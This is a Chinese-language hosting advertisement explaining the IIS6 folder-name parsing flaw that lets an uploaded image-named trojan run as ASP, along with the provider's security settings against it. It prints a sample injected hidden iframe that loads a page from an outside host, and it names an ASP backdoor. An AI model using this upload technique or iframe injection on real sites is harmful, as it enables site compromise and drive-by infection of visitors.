在Google中搜索：因系統層出不窮的上傳漏洞、注入漏洞、Win2003本身的設計缺陷，導致目前國內大多數的中小網站都存在或多或少的安全問題。加之很多網站管理員的安全水平有限，目前網頁病毒木馬非常猖獗。作為一家中小企業有必要搭建起一個管理企業網絡的技術服務平臺，以適應企業實現與國際競爭接軌、實現網絡化和信息化的要求。當然，這也是日漸激烈的市場競爭，對中小企業“網管”的時代要求。 

　　Windows 2003 Enterprise Edition是微軟目前主流的服務器操作系統。 Windows 2003 IIS6 存在著文件解析路徑的漏洞，當文件夾名為類似hack.asp的時候（即文件夾名看起來像一個ASP文件的文件名），此時此文件夾下的任何類型的文件(比如.gif，.jpg，.txt等)都可以在IIS中被當做ASP程序來執行。這樣黑客即可上傳擴展名為jpg或gif之類的看起來像是圖片文件的木馬文件，通過訪問這個文件即可運行木馬。因為微軟尚未發布這個漏洞的補丁，所以幾乎所有網站都會存在這個漏洞。經測試，這個問題不限于asp,甚至php, CGI等都存在這種問題。 

    目前國內大部分的網站都是運行在IIS6下，如果這些網站中有任何一個文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結尾，那么放在這些文件夾下面的任何類型的文件都有可能被認為是腳本文件而交給腳本解析器而執行，如果黑客將一個 hack.asp 文件改名為 hack.gif 上傳到這些目錄中，那么不堪設想。據悉，http://www.gz1024.com 利用其技術優勢，推出10重安全保障的虛擬主機。  

   一，Stream開關可自由設置，ASP中的ADODB.Stream 對象用來操作二進制或文本數據的流。通常用于無組件上傳和驗證碼等功能。關閉該組件可以提高網站安全。 Fso開關也可自由設置，FSO(FileSystemObject)是微軟ASP的一個對文件操作的控件，該控件可以對服務器進行讀取、新建、修改、刪除目錄以及文件的操作。關閉該組件有利于提高網站安全。  

　 二，假設網站建設好后，今后一段時間都不會再用到ftp上傳功能，這時可以暫時關閉FTP上傳，有助于提高網站的安全，即使ftp密碼泄露，黑客也不能操作空間內的文件，設置后60秒后生效。  

　 三，另外還可設置腳本權限與寫入權限，如果網站只使用了asp，可設置為只開放asp權限。這樣黑客即使上傳了php的木馬到空間也不能運行，最少的權限＝最大的安全。寫入權限設置則系統支持全國領先的目錄權限設置，允許關閉網站的寫入權限，鎖定虛擬主機。對安全有重要意義，例如可以將access數據庫放在databases目錄，而將wwwroot目錄的寫入 權限關閉，令asp木馬根本無法上傳，這樣比關閉FSO更安全。 

多重安全保障解決漏洞問題 

   是否經常有人到論壇發些廣告信息而感到煩惱？這時，它的作用產生了，可以明確拒絕或授權某些IP地址對網站的訪問。對某些重要的子目錄，如論壇的后臺管理目錄/admin/可以設置為所有人拒絕訪問，只允許自己的ip訪問.這樣即使黑客知道了論壇的超級管理密碼，也無法對論壇進行管理和破壞。重要文件還可設置保護，當文件被保護之后，該文件將無法從web訪問。可以使用該功能來保護重要文件的安全性，比如ACCESS數據庫等。  

  是否擔心被黑客攻擊網站導致癱瘓？通常用戶網站被黑（如網頁被篡改,文件被盜，被刪等）都是因為黑客通過網站的文件上傳功能將asp/php木馬上傳到空間并運行造成的。所以在無法確認系統是否存在上傳漏洞的情況下，只要保證文件上傳目錄沒有腳本運行權限，那么即便黑客將木馬上傳到空間也無法運行,這樣就無法危及網站。   

   如果網站存在上傳漏洞或注入漏洞，很容易被黑客上傳木馬，添加病毒代碼。查看網頁源代碼，會發現病毒代碼一般是：<iframe src=http://www.hao234gs.cn/m.htm width=0 height=0></iframe>等，而黑客通常會在網站里面留下后門程序，如海洋頂端asp木馬，以便日后再次侵入網站。使用“病毒查殺”功能，可以批量清除木馬代碼，省去了先下載，再手工刪除，再上傳的麻煩，并且將這些病毒木馬一網打盡。'